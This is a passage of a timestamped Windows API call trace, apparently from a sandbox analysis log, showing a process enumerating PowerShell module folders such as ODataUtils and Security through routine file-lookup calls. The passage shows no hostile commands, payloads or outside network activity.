ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0264.938] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.938] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0264.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0264.939] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0264.939] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0264.939] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.939] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.940] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0264.940] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0264.940] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0264.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0264.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0264.940] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0264.940] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0264.940] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.941] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.941] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0264.941] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.941] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0264.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0264.941] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b81df70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0264.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3b0) returned 1 [0264.941] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b81e490 | out: lpFileInformation=0x1b81e490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e370) returned 1 [0264.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3e0) returned 1 [0264.942] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b81ded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0264.942] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0264.942] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b81e080 | out: lpFindFileData=0x1b81e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0264.942] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.942] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0264.942] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0264.942] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e330) returned 1 [0264.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2f0) returned 1 [0264.943] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psd1")) returned 0xffffffff [0264.943] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psm1")) returned 0xffffffff [0264.943] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.cdxml")) returned 0xffffffff [0264.943] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff [0264.943] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.dll")) returned 0xffffffff [0264.943] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0264.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.943] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.943] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0264.944] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0264.944] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.944] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.944] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0264.944] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0264.944] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0264.944] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0264.945] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0264.945] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0264.945] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0264.945] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.945] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0264.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.946] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0264.946] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\", lpFilePart=0x0) returned 0x51 [0264.946] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.946] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.946] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0264.946] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0264.946] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.947] SetThreadErrorMode (dwNewMode=0x0, 